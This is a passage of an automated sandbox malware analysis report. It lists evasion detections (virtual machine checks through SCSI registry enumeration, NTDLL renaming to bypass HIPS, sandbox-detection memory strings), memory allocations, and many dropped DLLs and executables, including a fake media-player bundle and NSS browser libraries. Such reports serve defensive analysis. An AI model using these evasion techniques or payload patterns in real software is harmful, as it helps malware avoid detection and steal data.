      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Renames NTDLL to bypass HIPS
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDERWINDOWS 874[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONATTACK_TYPEBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGETPEERNAMEGETSOCKNAMEHOST IS NILHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTNOTIFY-HOSTORANNIS.COMRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSECURE_BOOTSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUPDATE-DATAUPLOAD-FILEUSERENV.DLLVERSION=179VM DETECTEDVMUSRVC.EXEWININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 5A50000 memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 8B10000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 9010000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 9070000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 90D0000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 9130000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 91F0000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 9270000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: 92D0000 memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: AD20000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: B970000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: B990000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: B9B0000 memory commit | memory reserve | memory write watch
      Source: C:\Program Files (x86)\Browzar\Browzar.exeMemory allocated: B9D0000 memory commit | memory reserve | memory write watch
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\freebl3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\lighteningplayer.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\connection.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeDropped PE file which has not been started: C:\Program Files (x86)\Browzar\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\install.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\mozglue[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\softokn3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\data_load.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\msvcp140.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libvlccore.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\vcruntime140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\mozglue.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeDropped PE file which has not been started: C:\Program Files (x86)\Company\NewProduct\Uninstall.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libvlc.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll
